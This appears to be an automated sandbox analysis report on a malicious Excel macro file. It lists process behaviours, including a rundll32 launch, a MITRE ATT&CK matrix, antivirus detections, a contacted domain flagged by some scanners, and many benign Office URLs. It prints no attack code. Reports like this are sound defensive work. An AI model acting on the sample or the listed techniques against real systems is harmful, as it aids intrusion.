    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Refusal-1605078281-01212021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: Refusal-1605078281-01212021.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: Refusal-1605078281-01212021.xlsmInitial sample: OLE zip file path = xl/media/image3.png
    Source: Refusal-1605078281-01212021.xlsmInitial sample: OLE zip file path = xl/media/image2.png
    Source: Refusal-1605078281-01212021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: Refusal-1605078281-01212021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: Refusal-1605078281-01212021.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: rundll32.exe, 00000001.00000002.259550751.0000000004520000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: rundll32.exe, 00000001.00000002.259550751.0000000004520000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: rundll32.exe, 00000001.00000002.259550751.0000000004520000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: rundll32.exe, 00000001.00000002.259550751.0000000004520000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Replication Through Removable Media1Scripting11Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Replication Through Removable Media1Data from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution21Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryPeripheral Device Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Information Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Refusal-1605078281-01212021.xlsm7%ReversingLabsDocument-Excel.Trojan.Heuristic

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    leafybuy.com6%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    leafybuy.com
    unknown
    unknowntrueunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.com3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
      high
      https://login.microsoftonline.com/3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
        high
        https://shell.suite.office.com:14433004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
            high
            https://autodiscover-s.outlook.com/3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
              high
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                high
                https://cdn.entity.3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/query3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                  high
                  https://wus2-000.contentsync.3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://clients.config.office.net/user/v1.0/tenantassociationkey3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                    high
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                      high
                      https://powerlift.acompli.net3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.com3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v13004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                        high
                        https://cortana.ai3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspx3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                              high
                              https://entitlement.diagnosticssdf.office.com3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                  high
                                  https://api.aadrm.com/3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                    high
                                    https://api.microsoftstream.com/api/3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                        high
                                        https://cr.office.com3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                          high
                                          https://portal.office.com/account/?ref=ClientMeControl3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                            high
                                            https://ecs.office.com/config/v2/Office3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                              high
                                              https://graph.ppe.windows.net3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptionevents3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.net3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.com3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/work3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                    high
                                                    https://store.office.cn/addinstemplate3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://wus2-000.pagecontentsync.3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                      high
                                                      https://globaldisco.crm.dynamics.com3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                        high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                          high
                                                          https://store.officeppe.com/addinstemplate3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://dev0-api.acompli.net/autodetect3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.odwebp.svc.ms3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://api.powerbi.com/v1.0/myorg/groups3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                              high
                                                              https://graph.windows.net3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.com3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/api3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetect3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.json3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                          high
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspx3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                      high
                                                                                      https://management.azure.com3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                        high
                                                                                        https://incidents.diagnostics.office.com3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/ios3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmedia3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.com3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/Activities3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.net3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.com3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policies3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.com3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office.com/3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/log3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office365.com/3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                    high
                                                                                                                    https://webshell.suite.office.com3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                      high
                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                        high
                                                                                                                        https://management.azure.com/3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                          high
                                                                                                                          https://ncus-000.contentsync.3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://login.windows.net/common/oauth2/authorize3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                            high
                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://graph.windows.net/3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                              high
                                                                                                                              https://api.powerbi.com/beta/myorg/imports3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                                high
                                                                                                                                https://devnull.onenote.com3004DB52-1097-432F-8F3D-E32CBC0917F7.0.drfalse
                                                                                                                                  high
